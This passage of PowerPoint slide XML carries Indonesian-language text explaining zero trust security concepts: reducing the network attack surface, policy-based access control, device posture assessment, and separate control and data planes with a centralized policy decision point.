              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pesawat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Model Zero Trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero trust, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencurigakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencerminkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
